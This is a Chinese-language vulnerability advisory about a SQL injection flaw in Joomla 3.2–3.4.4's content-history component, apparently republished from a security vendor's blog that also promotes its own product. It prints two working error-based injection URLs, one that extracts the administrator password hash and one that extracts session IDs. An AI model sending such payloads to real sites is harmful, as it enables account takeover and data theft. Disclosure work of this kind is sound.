知名CMS软件Joomla 存SQL注入漏洞

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

  近日,Trustwave SpiderLabs 研究员Asaf Orpani 发现知名CMS Joomla 3.2—3.4.4版本中存在SQL注入漏洞,经安全狗实验室检测该漏洞危害巨大,影响范围广,利用难度低。目前官方已在3.4.5版本中修复该漏洞,请相关网站及时更新。另外,经测试安全狗可防御该漏洞。

漏洞详细说明与利用方法

据 Asaf Orpani 分析得出,该SQL注入漏洞存在于

/administrator /components /com_contenthistory/ models/history.php 处。

知名CMS软件Joomla 存SQL注入漏洞_第1张图片

  以下几行描述Joomla原理的代码则可以帮助我们去利用这个漏洞(Payload)

知名CMS软件Joomla 存SQL注入漏洞_第2张图片

执行该段代码之后返回页面如下,可直接获取用户session:

知名CMS软件Joomla 存SQL注入漏洞_第3张图片

经测试可用如下payload直接获取管理员密码:

http://10.211.55.3/joomla/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select (select concat(password)) from %23__users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

如图示:

知名CMS软件Joomla 存SQL注入漏洞_第4张图片

以上payload不能爆session_id,经过我们实验室修改后下面这段可以完美爆session_id 。

/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]= (select 1=updatexml(1,concat(0x5e24,(select session_id from jml_session limit 0,1),0x5e24),1))

如下图所示:

知名CMS软件Joomla 存SQL注入漏洞_第5张图片

  而在详细的了解了该漏洞的利用原理之后,安全狗相关技术人员进行了检测,最终发现安全狗旗下产品网站安全狗可防御该漏洞,请广大用户放心使用。



转载于:https://my.oschina.net/safedog/blog/521352

你可能感兴趣的:(知名CMS软件Joomla 存SQL注入漏洞)